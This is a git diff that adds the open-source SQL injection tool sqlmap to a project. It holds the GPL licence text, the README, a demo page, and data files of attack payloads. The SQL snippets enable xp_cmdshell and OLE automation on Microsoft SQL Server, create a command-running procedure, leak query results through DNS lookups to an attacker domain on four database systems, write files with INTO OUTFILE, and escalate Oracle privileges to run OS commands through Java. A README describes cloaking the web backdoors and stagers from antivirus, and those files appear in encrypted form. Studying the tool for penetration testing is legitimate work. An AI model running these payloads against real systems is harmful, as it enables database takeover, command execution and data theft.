acceptance of this License to do so, and +all its terms and conditions for copying, distributing or modifying +the Program or works based on it. + + 6. Each time you redistribute the Program (or any work based on the +Program), the recipient automatically receives a license from the +original licensor to copy, distribute or modify the Program subject to +these terms and conditions. You may not impose any further +restrictions on the recipients' exercise of the rights granted herein. +You are not responsible for enforcing compliance by third parties to +this License. + + 7. If, as a consequence of a court judgment or allegation of patent +infringement or for any other reason (not limited to patent issues), +conditions are imposed on you (whether by court order, agreement or +otherwise) that contradict the conditions of this License, they do not +excuse you from the conditions of this License. If you cannot +distribute so as to satisfy simultaneously your obligations under this +License and any other pertinent obligations, then as a consequence you +may not distribute the Program at all. For example, if a patent +license would not permit royalty-free redistribution of the Program by +all those who receive copies directly or indirectly through you, then +the only way you could satisfy both it and this License would be to +refrain entirely from distribution of the Program. + +If any portion of this section is held invalid or unenforceable under +any particular circumstance, the balance of the section is intended to +apply and the section as a whole is intended to apply in other +circumstances. + +It is not the purpose of this section to induce you to infringe any +patents or other property right claims or to contest validity of any +such claims; this section has the sole purpose of protecting the +integrity of the free software distribution system, which is +implemented by public license practices. Many people have made +generous contributions to the wide range of software distributed +through that system in reliance on consistent application of that +system; it is up to the author/donor to decide if he or she is willing +to distribute software through any other system and a licensee cannot +impose that choice. + +This section is intended to make thoroughly clear what is believed to +be a consequence of the rest of this License. + + 8. If the distribution and/or use of the Program is restricted in +certain countries either by patents or by copyrighted interfaces, the +original copyright holder who places the Program under this License +may add an explicit geographical distribution limitation excluding +those countries, so that distribution is permitted only in or among +countries not thus excluded. In such case, this License incorporates +the limitation as if written in the body of this License. + + 9. The Free Software Foundation may publish revised and/or new versions +of the General Public License from time to time. Such new versions will +be similar in spirit to the present version, but may differ in detail to +address new problems or concerns. + +Each version is given a distinguishing version number. If the Program +specifies a version number of this License which applies to it and "any +later version", you have the option of following the terms and conditions +either of that version or of any later version published by the Free +Software Foundation. If the Program does not specify a version number of +this License, you may choose any version ever published by the Free Software +Foundation. + + 10. If you wish to incorporate parts of the Program into other free +programs whose distribution conditions are different, write to the author +to ask for permission. For software which is copyrighted by the Free +Software Foundation, write to the Free Software Foundation; we sometimes +make exceptions for this. Our decision will be guided by the two goals +of preserving the free status of all derivatives of our free software and +of promoting the sharing and reuse of software generally. + + NO WARRANTY + + 11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY +FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN +OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES +PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED +OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF +MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS +TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE +PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, +REPAIR OR CORRECTION. + + 12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING +WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR +REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, +INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING +OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED +TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY +YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER +PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE +POSSIBILITY OF SUCH DAMAGES. + + END OF TERMS AND CONDITIONS diff --git a/src/sqlmap-master/README.md b/src/sqlmap-master/README.md new file mode 100644 index 0000000..821ab02 --- /dev/null +++ b/src/sqlmap-master/README.md @@ -0,0 +1,78 @@ +# sqlmap ![](https://i.imgur.com/fe85aVR.png) + +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) + +sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester, and a broad range of switches including database fingerprinting, over data fetching from the database, accessing the underlying file system, and executing commands on the operating system via out-of-band connections. + +Screenshots +---- + +![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + +You can visit the [collection of screenshots](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) demonstrating some of the features on the wiki. + +Installation +---- + +You can download the latest tarball by clicking [here](https://github.com/sqlmapproject/sqlmap/tarball/master) or latest zipball by clicking [here](https://github.com/sqlmapproject/sqlmap/zipball/master). + +Preferably, you can download sqlmap by cloning the [Git](https://github.com/sqlmapproject/sqlmap) repository: + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmap works out of the box with [Python](https://www.python.org/download/) version **2.6**, **2.7** and **3.x** on any platform. + +Usage +---- + +To get a list of basic options and switches use: + + python sqlmap.py -h + +To get a list of all options and switches use: + + python sqlmap.py -hh + +You can find a sample run [here](https://asciinema.org/a/46601). +To get an overview of sqlmap capabilities, a list of supported features, and a description of all options and switches, along with examples, you are advised to consult the [user's manual](https://github.com/sqlmapproject/sqlmap/wiki/Usage). + +Links +---- + +* Homepage: https://sqlmap.org +* Download: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues +* User's manual: https://github.com/sqlmapproject/sqlmap/wiki +* Frequently Asked Questions (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* X: [@sqlmap](https://twitter.com/sqlmap) +* Demos: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) +* Screenshots: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots + +Translations +---- + +* [Bulgarian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-bg-BG.md) +* [Chinese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-zh-CN.md) +* [Croatian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-hr-HR.md) +* [Dutch](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-nl-NL.md) +* [French](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-fr-FR.md) +* [Georgian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ka-GE.md) +* [German](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-de-DE.md) +* [Greek](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-gr-GR.md) +* [Hindi](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-in-HI.md) +* [Indonesian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-id-ID.md) +* [Italian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-it-IT.md) +* [Japanese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ja-JP.md) +* [Korean](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ko-KR.md) +* [Kurdish (Central)](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ckb-KU.md) +* [Persian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-fa-IR.md) +* [Polish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pl-PL.md) +* [Portuguese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pt-BR.md) +* [Russian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ru-RU.md) +* [Serbian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-rs-RS.md) +* [Slovak](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-sk-SK.md) +* [Spanish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-es-MX.md) +* [Turkish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-tr-TR.md) +* [Ukrainian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-uk-UA.md) +* [Vietnamese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-vi-VN.md) diff --git a/src/sqlmap-master/data/html/index.html b/src/sqlmap-master/data/html/index.html new file mode 100644 index 0000000..576f276 --- /dev/null +++ b/src/sqlmap-master/data/html/index.html @@ -0,0 +1,151 @@ + + + + + + + DEMO + + + + + + + + + + +
+ + + +
+
+

DEMO

+
+
+
+ + + + + diff --git a/src/sqlmap-master/data/procs/README.txt b/src/sqlmap-master/data/procs/README.txt new file mode 100644 index 0000000..c693f06 --- /dev/null +++ b/src/sqlmap-master/data/procs/README.txt @@ -0,0 +1,4 @@ +Files in this folder represent SQL snippets used by sqlmap on the target +system. +They are licensed under the terms of the GNU Lesser General Public License +where not specified otherwise. diff --git a/src/sqlmap-master/data/procs/mssqlserver/activate_sp_oacreate.sql b/src/sqlmap-master/data/procs/mssqlserver/activate_sp_oacreate.sql new file mode 100644 index 0000000..753efb7 --- /dev/null +++ b/src/sqlmap-master/data/procs/mssqlserver/activate_sp_oacreate.sql @@ -0,0 +1,4 @@ +EXEC master..sp_configure 'show advanced options',1; +RECONFIGURE WITH OVERRIDE; +EXEC master..sp_configure 'ole automation procedures',1; +RECONFIGURE WITH OVERRIDE diff --git a/src/sqlmap-master/data/procs/mssqlserver/configure_openrowset.sql b/src/sqlmap-master/data/procs/mssqlserver/configure_openrowset.sql new file mode 100644 index 0000000..5f3d6d8 --- /dev/null +++ b/src/sqlmap-master/data/procs/mssqlserver/configure_openrowset.sql @@ -0,0 +1,6 @@ +EXEC master..sp_configure 'show advanced options', 1; +RECONFIGURE WITH OVERRIDE; +EXEC master..sp_configure 'Ad Hoc Distributed Queries', %ENABLE%; +RECONFIGURE WITH OVERRIDE; +EXEC sp_configure 'show advanced options', 0; +RECONFIGURE WITH OVERRIDE diff --git a/src/sqlmap-master/data/procs/mssqlserver/configure_xp_cmdshell.sql b/src/sqlmap-master/data/procs/mssqlserver/configure_xp_cmdshell.sql new file mode 100644 index 0000000..e23e4b0 --- /dev/null +++ b/src/sqlmap-master/data/procs/mssqlserver/configure_xp_cmdshell.sql @@ -0,0 +1,6 @@ +EXEC master..sp_configure 'show advanced options',1; +RECONFIGURE WITH OVERRIDE; +EXEC master..sp_configure 'xp_cmdshell',%ENABLE%; +RECONFIGURE WITH OVERRIDE; +EXEC master..sp_configure 'show advanced options',0; +RECONFIGURE WITH OVERRIDE diff --git a/src/sqlmap-master/data/procs/mssqlserver/create_new_xp_cmdshell.sql b/src/sqlmap-master/data/procs/mssqlserver/create_new_xp_cmdshell.sql new file mode 100644 index 0000000..0057308 --- /dev/null +++ b/src/sqlmap-master/data/procs/mssqlserver/create_new_xp_cmdshell.sql @@ -0,0 +1,3 @@ +DECLARE @%RANDSTR% nvarchar(999); +set @%RANDSTR%='CREATE PROCEDURE new_xp_cmdshell(@cmd varchar(255)) AS DECLARE @ID int EXEC sp_OACreate ''WScript.Shell'',@ID OUT EXEC sp_OAMethod @ID,''Run'',Null,@cmd,0,1 EXEC sp_OADestroy @ID'; +EXEC master..sp_executesql @%RANDSTR% diff --git a/src/sqlmap-master/data/procs/mssqlserver/disable_xp_cmdshell_2000.sql b/src/sqlmap-master/data/procs/mssqlserver/disable_xp_cmdshell_2000.sql new file mode 100644 index 0000000..379f651 --- /dev/null +++ b/src/sqlmap-master/data/procs/mssqlserver/disable_xp_cmdshell_2000.sql @@ -0,0 +1 @@ +EXEC master..sp_dropextendedproc 'xp_cmdshell' diff --git a/src/sqlmap-master/data/procs/mssqlserver/dns_request.sql b/src/sqlmap-master/data/procs/mssqlserver/dns_request.sql new file mode 100644 index 0000000..a269c7e --- /dev/null +++ b/src/sqlmap-master/data/procs/mssqlserver/dns_request.sql @@ -0,0 +1,4 @@ +DECLARE @host varchar(1024); +SELECT @host='%PREFIX%.'+(%QUERY%)+'.%SUFFIX%.%DOMAIN%'; +EXEC('master..xp_dirtree "\\'+@host+'\%RANDSTR1%"') +# or EXEC('master..xp_fileexist "\\'+@host+'\%RANDSTR1%"') diff --git a/src/sqlmap-master/data/procs/mssqlserver/enable_xp_cmdshell_2000.sql b/src/sqlmap-master/data/procs/mssqlserver/enable_xp_cmdshell_2000.sql new file mode 100644 index 0000000..2ec1552 --- /dev/null +++ b/src/sqlmap-master/data/procs/mssqlserver/enable_xp_cmdshell_2000.sql @@ -0,0 +1 @@ +EXEC master..sp_addextendedproc 'xp_cmdshell', @dllname='xplog70.dll' diff --git a/src/sqlmap-master/data/procs/mssqlserver/run_statement_as_user.sql b/src/sqlmap-master/data/procs/mssqlserver/run_statement_as_user.sql new file mode 100644 index 0000000..575c22e --- /dev/null +++ b/src/sqlmap-master/data/procs/mssqlserver/run_statement_as_user.sql @@ -0,0 +1,3 @@ +SELECT * FROM OPENROWSET('SQLOLEDB','';'%USER%';'%PASSWORD%','SET FMTONLY OFF %STATEMENT%') +# SELECT * FROM OPENROWSET('SQLNCLI', 'server=(local);trusted_connection=yes','SET FMTONLY OFF SELECT 1;%STATEMENT%') +# SELECT * FROM OPENROWSET('SQLOLEDB','Network=DBMSSOCN;Address=;uid=%USER%;pwd=%PASSWORD%','SET FMTONLY OFF %STATEMENT%') diff --git a/src/sqlmap-master/data/procs/mysql/dns_request.sql b/src/sqlmap-master/data/procs/mysql/dns_request.sql new file mode 100644 index 0000000..e32fc47 --- /dev/null +++ b/src/sqlmap-master/data/procs/mysql/dns_request.sql @@ -0,0 +1 @@ +SELECT LOAD_FILE(CONCAT('\\\\%PREFIX%.',(%QUERY%),'.%SUFFIX%.%DOMAIN%\\%RANDSTR1%')) diff --git a/src/sqlmap-master/data/procs/mysql/write_file_limit.sql b/src/sqlmap-master/data/procs/mysql/write_file_limit.sql new file mode 100644 index 0000000..e879fbe --- /dev/null +++ b/src/sqlmap-master/data/procs/mysql/write_file_limit.sql @@ -0,0 +1 @@ +LIMIT 0,1 INTO OUTFILE '%OUTFILE%' LINES TERMINATED BY 0x%HEXSTRING%-- - diff --git a/src/sqlmap-master/data/procs/oracle/dns_request.sql b/src/sqlmap-master/data/procs/oracle/dns_request.sql new file mode 100644 index 0000000..5dda762 --- /dev/null +++ b/src/sqlmap-master/data/procs/oracle/dns_request.sql @@ -0,0 +1,3 @@ +SELECT UTL_INADDR.GET_HOST_ADDRESS('%PREFIX%.'||(%QUERY%)||'.%SUFFIX%.%DOMAIN%') FROM DUAL +# or SELECT UTL_HTTP.REQUEST('http://%PREFIX%.'||(%QUERY%)||'.%SUFFIX%.%DOMAIN%') FROM DUAL +# or (CVE-2014-6577) SELECT EXTRACTVALUE(xmltype(' %remote;]>'),'/l') FROM dual diff --git a/src/sqlmap-master/data/procs/oracle/read_file_export_extension.sql b/src/sqlmap-master/data/procs/oracle/read_file_export_extension.sql new file mode 100644 index 0000000..3d66bba --- /dev/null +++ b/src/sqlmap-master/data/procs/oracle/read_file_export_extension.sql @@ -0,0 +1,4 @@ +SELECT SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('%RANDSTR1%','%RANDSTR2%','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace and compile java source named "OsUtil" as import java.io.*; public class OsUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}}'''';END;'';END;--','SYS',0,'1',0) FROM DUAL +SELECT SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('%RANDSTR1%','%RANDSTR2%','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) FROM DUAL +SELECT SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('%RANDSTR1%','%RANDSTR2%','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace function OSREADFILE(filename in varchar2) return varchar2 as language java name ''''''''OsUtil.readFile(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) FROM DUAL +SELECT SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('%RANDSTR1%','%RANDSTR2%','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on OSREADFILE to public'''';END;'';END;--','SYS',0,'1',0) FROM DUAL diff --git a/src/sqlmap-master/data/procs/postgresql/dns_request.sql b/src/sqlmap-master/data/procs/postgresql/dns_request.sql new file mode 100644 index 0000000..6724af2 --- /dev/null +++ b/src/sqlmap-master/data/procs/postgresql/dns_request.sql @@ -0,0 +1,14 @@ +DROP TABLE IF EXISTS %RANDSTR1%; +# https://wiki.postgresql.org/wiki/CREATE_OR_REPLACE_LANGUAGE <- if "CREATE LANGUAGE plpgsql" is required +CREATE TABLE %RANDSTR1%(%RANDSTR2% text); +CREATE OR REPLACE FUNCTION %RANDSTR3%() +RETURNS VOID AS $$ +DECLARE %RANDSTR4% TEXT; +DECLARE %RANDSTR5% TEXT; +BEGIN +SELECT INTO %RANDSTR5% (%QUERY%); +%RANDSTR4% := E'COPY %RANDSTR1%(%RANDSTR2%) FROM E\'\\\\\\\\%PREFIX%.'||%RANDSTR5%||E'.%SUFFIX%.%DOMAIN%\\\\%RANDSTR6%\''; +EXECUTE %RANDSTR4%; +END; +$$ LANGUAGE plpgsql SECURITY DEFINER; +SELECT %RANDSTR3%(); \ No newline at end of file diff --git a/src/sqlmap-master/data/shell/README.txt b/src/sqlmap-master/data/shell/README.txt new file mode 100644 index 0000000..4c64c41 --- /dev/null +++ b/src/sqlmap-master/data/shell/README.txt @@ -0,0 +1,7 @@ +Due to the anti-virus positive detection of shell scripts stored inside this folder, we needed to somehow circumvent this. As from the plain sqlmap users perspective nothing has to be done prior to their usage by sqlmap, but if you want to have access to their original source code use the decrypt functionality of the ../../extra/cloak/cloak.py utility. + +To prepare the original scripts to the cloaked form use this command: +find backdoors/backdoor.* stagers/stager.* -type f -exec python ../../extra/cloak/cloak.py -i '{}' \; + +To get back them into the original form use this: +find backdoors/backdoor.*_ stagers/stager.*_ -type f -exec python ../../extra/cloak/cloak.py -d -i '{}' \; diff --git a/src/sqlmap-master/data/shell/backdoors/backdoor.asp_ b/src/sqlmap-master/data/shell/backdoors/backdoor.asp_ new file mode 100644 index 0000000..bc91203 --- /dev/null +++ b/src/sqlmap-master/data/shell/backdoors/backdoor.asp_ @@ -0,0 +1,3 @@ +=ܩt bRU&hR} DtC!3y >7 pQMb-{Y?=lٲ ]6a\5 + ]iZ*pO|SkC)1Os|Ef@l{a2(Pr8Cөn%f ߚ A=@(x~ֱ$ˉ)9= 5.0 +'debian-sys-maint'@'localhost' +'root'@'%' +'root'@'localhost' + +# MySQL < 5.0 +debian-sys-maint +root + +# PostgreSQL +postgres + +# Oracle +ANONYMOUS +CTXSYS +DBSNMP +DIP +DMSYS +EXFSYS +MDDATA +MDSYS +MGMT_VIEW +OLAPSYS +ORDPLUGINS +ORDSYS +OUTLN +SCOTT +SI_INFORMTN_SCHEMA +SYS +SYSMAN +SYSTEM +TSMSYS +WMSYS +XDB + +# Microsoft SQL Server +sa + + +[Passwords] + +# MySQL +*00E247AC5F9AF26AE0194B41E1E769DEE1429A29 # testpass + +# PostgreSQL +md599e5ea7a6f7c3269995cba3927fd0093 # testpass + +# Oracle +2D5A0C491B634F1B # testpass + +# Microsoft SQL Server +0x0100098a6200f657f7d012dfa7dc1fd1b154d4dfb8cd20596d22 # testpass + + +[Privileges] + +# MySQL >= 5.0 +ALTER +ALTER ROUTINE +CREATE +CREATE ROUTINE +CREATE TEMPORARY TABLES +CREATE USER +CREATE VIEW +DELETE +DROP +EVENT +EXECUTE +FILE +INDEX +INSERT +LOCK TABLES +PROCESS +REFERENCES +RELOAD +REPLICATION CLIENT +REPLICATION SLAVE +SELECT +SHOW DATABASES +SHOW VIEW +SHUTDOWN +SUPER +TRIGGER +UPDATE +USAGE + +# MySQL < 5.0 +select_priv +insert_priv +update_priv +delete_priv +create_priv +drop_priv +reload_priv +shutdown_priv +process_priv +file_priv +grant_priv +references_priv +index_priv +alter_priv +show_db_priv +super_priv +create_tmp_table_priv +lock_tables_priv +execute_priv +repl_slave_priv +repl_client_priv +create_view_priv +show_view_priv +create_routine_priv +alter_routine_priv +create_user_priv + +# PostgreSQL +catupd +createdb +super + +# Oracle +ADMINISTER ANY SQL TUNING SET +ADMINISTER DATABASE TRIGGER +ADMINISTER RESOURCE MANAGER +ADMINISTER SQL TUNING SET +ADVISOR +ALTER ANY CLUSTER +ALTER ANY DIMENSION +ALTER ANY EVALUATION CONTEXT +ALTER ANY INDEX +ALTER ANY INDEXTYPE +ALTER ANY LIBRARY +ALTER ANY MATERIALIZED VIEW +ALTER ANY OUTLINE +ALTER ANY PROCEDURE +ALTER ANY ROLE +ALTER ANY RULE +ALTER ANY RULE SET +ALTER ANY SEQUENCE +ALTER ANY SQL PROFILE +ALTER ANY TABLE +ALTER ANY TRIGGER +ALTER ANY TYPE +ALTER DATABASE +ALTER PROFILE +ALTER RESOURCE COST +ALTER ROLLBACK SEGMENT +ALTER SESSION +ALTER SYSTEM +ALTER TABLESPACE +ALTER USER +ANALYZE ANY +ANALYZE ANY DICTIONARY +AUDIT ANY +AUDIT SYSTEM +BACKUP ANY TABLE +BECOME USER +CHANGE NOTIFICATION +COMMENT ANY TABLE +CREATE ANY CLUSTER +CREATE ANY CONTEXT +CREATE ANY DIMENSION +CREATE ANY DIRECTORY +CREATE ANY EVALUATION CONTEXT +CREATE ANY INDEX +CREATE ANY INDEXTYPE +CREATE ANY JOB +CREATE ANY LIBRARY +CREATE ANY MATERIALIZED VIEW +CREATE ANY OPERATOR +CREATE ANY OUTLINE +CREATE ANY PROCEDURE +CREATE ANY RULE +CREATE ANY RULE SET +CREATE ANY SEQUENCE +CREATE ANY SQL PROFILE +CREATE ANY SYNONYM +CREATE ANY TABLE +CREATE ANY TRIGGER +CREATE ANY TYPE +CREATE ANY VIEW +CREATE CLUSTER +CREATE DATABASE LINK +CREATE DIMENSION +CREATE EVALUATION CONTEXT +CREATE EXTERNAL JOB +CREATE INDEXTYPE +CREATE JOB +CREATE LIBRARY +CREATE MATERIALIZED VIEW +CREATE OPERATOR +CREATE PROCEDURE +CREATE PROFILE +CREATE PUBLIC DATABASE LINK +CREATE PUBLIC SYNONYM +CREATE ROLE +CREATE ROLLBACK SEGMENT +CREATE RULE +CREATE RULE SET +CREATE SEQUENCE +CREATE SESSION +CREATE SYNONYM +CREATE TABLE +CREATE TABLESPACE +CREATE TRIGGER +CREATE TYPE +CREATE USER +CREATE VIEW +DEBUG ANY PROCEDURE +DEBUG CONNECT SESSION +DELETE ANY TABLE +DEQUEUE ANY QUEUE +DROP ANY CLUSTER +DROP ANY CONTEXT +DROP ANY DIMENSION +DROP ANY DIRECTORY +DROP ANY EVALUATION CONTEXT +DROP ANY INDEX +DROP ANY INDEXTYPE +DROP ANY LIBRARY +DROP ANY MATERIALIZED VIEW +DROP ANY OPERATOR +DROP ANY OUTLINE +DROP ANY PROCEDURE +DROP ANY ROLE +DROP ANY RULE +DROP ANY RULE SET +DROP ANY SEQUENCE +DROP ANY SQL PROFILE +DROP ANY SYNONYM +DROP ANY TABLE +DROP ANY TRIGGER +DROP ANY TYPE +DROP ANY VIEW +DROP PROFILE +DROP PUBLIC DATABASE LINK +DROP PUBLIC SYNONYM +DROP ROLLBACK SEGMENT +DROP TABLESPACE +DROP USER +ENQUEUE ANY QUEUE +EXECUTE ANY CLASS +EXECUTE ANY EVALUATION CONTEXT +EXECUTE ANY INDEXTYPE +EXECUTE ANY LIBRARY +EXECUTE ANY OPERATOR +EXECUTE ANY PROCEDURE +EXECUTE ANY PROGRAM +EXECUTE ANY RULE +EXECUTE ANY RULE SET +EXECUTE ANY TYPE +EXPORT FULL DATABASE +FLASHBACK ANY TABLE +FORCE ANY TRANSACTION +FORCE TRANSACTION +GLOBAL QUERY REWRITE +GRANT ANY OBJECT PRIVILEGE +GRANT ANY PRIVILEGE +GRANT ANY ROLE +IMPORT FULL DATABASE +INSERT ANY TABLE +LOCK ANY TABLE +MANAGE ANY FILE GROUP +MANAGE ANY QUEUE +MANAGE FILE GROUP +MANAGE SCHEDULER +MANAGE TABLESPACE +MERGE ANY VIEW +ON COMMIT REFRESH +QUERY REWRITE +READ ANY FILE GROUP +RESTRICTED SESSION +RESUMABLE +SELECT ANY DICTIONARY +SELECT ANY SEQUENCE +SELECT ANY TABLE +SELECT ANY TRANSACTION +UNDER ANY TABLE +UNDER ANY TYPE +UNDER ANY VIEW +UNLIMITED TABLESPACE +UPDATE ANY TABLE + + +[Roles] + +# Oracle +AQ_ADMINISTRATOR_ROLE +AQ_USER_ROLE +AUTHENTICATEDUSER +CONNECT +CTXAPP +DBA +DELETE_CATALOG_ROLE +EJBCLIENT +EXECUTE_CATALOG_ROLE +EXP_FULL_DATABASE +GATHER_SYSTEM_STATISTICS +HS_ADMIN_ROLE +IMP_FULL_DATABASE +JAVA_ADMIN +JAVADEBUGPRIV +JAVA_DEPLOY +JAVAIDPRIV +JAVASYSPRIV +JAVAUSERPRIV +LOGSTDBY_ADMINISTRATOR +MGMT_USER +OEM_ADVISOR +OEM_MONITOR +OLAP_DBA +OLAP_USER +RECOVERY_CATALOG_OWNER +RESOURCE +SCHEDULER_ADMIN +SELECT_CATALOG_ROLE +TABLE_ACCESSERS +WM_ADMIN_ROLE +XDBADMIN +XDBWEBSERVICES + + +[Databases] + +# MySQL +information_schema +performance_schema +mysql +phpmyadmin + +# PostgreSQL +pg_catalog +postgres +public +template0 +template1 + +# Microsoft SQL Server +AdventureWorks +AdventureWorksDW +master +model +msdb +ReportServer +ReportServerTempDB +tempdb + + +[Tables] + +# MySQL >= 5.0 +CHARACTER_SETS +COLLATION_CHARACTER_SET_APPLICABILITY +COLLATIONS +COLUMN_PRIVILEGES +COLUMNS +ENGINES +EVENTS +FILES +GLOBAL_STATUS +GLOBAL_VARIABLES +KEY_COLUMN_USAGE +PARTITIONS +PLUGINS +PROCESSLIST +PROFILING +REFERENTIAL_CONSTRAINTS +ROUTINES +SCHEMA_PRIVILEGES +SCHEMATA +SESSION_STATUS +SESSION_VARIABLES +STATISTICS +TABLE_CONSTRAINTS +TABLE_PRIVILEGES +TABLES +TRIGGERS +USER_PRIVILEGES +VIEWS + +# MySQL +columns_priv +db +event +func +general_log +help_category +help_keyword +help_relation +help_topic +host +ndb_binlog_index +plugin +proc +procs_priv +servers +slow_log +tables_priv +time_zone +time_zone_leap_second +time_zone_name +time_zone_transition +time_zone_transition_type +user + +# phpMyAdmin +pma_bookmark +pma_column_info +pma_designer_coords +pma_history +pma_pdf_pages +pma_relation +pma_table_coords +pma_table_info + +# PostgreSQL +pg_aggregate +pg_am +pg_amop +pg_amproc +pg_attrdef +pg_attribute +pg_authid +pg_auth_members +pg_cast +pg_class +pg_constraint +pg_conversion +pg_database +pg_depend +pg_description +pg_enum +pg_foreign_data_wrapper +pg_foreign_server +pg_index +pg_inherits +pg_language +pg_largeobject +pg_listener +pg_namespace +pg_opclass +pg_operator +pg_opfamily +pg_pltemplate +pg_proc +pg_rewrite +pg_shdepend +pg_shdescription +pg_statistic +pg_tablespace +pg_trigger +pg_ts_config +pg_ts_config_map +pg_ts_dict +pg_ts_parser +pg_ts_template +pg_type +pg_user_mapping +sql_features +sql_implementation_info +sql_languages +sql_packages +sql_parts +sql_sizing +sql_sizing_profiles + +# Oracle (demo database) +BONUS +DEPT +EMP +SALGRADE +USERS + +# Microsoft SQL Server +## Database: AdventureWorksDW +AdventureWorksDWBuildVersion +DatabaseLog +DimAccount +DimCurrency +DimCustomer +DimDepartmentGroup +DimEmployee +DimGeography +DimOrganization +DimProduct +DimProductCategory +DimProductSubcategory +DimPromotion +DimReseller +DimSalesReason +DimSalesTerritory +DimScenario +DimTime +FactCurrencyRate 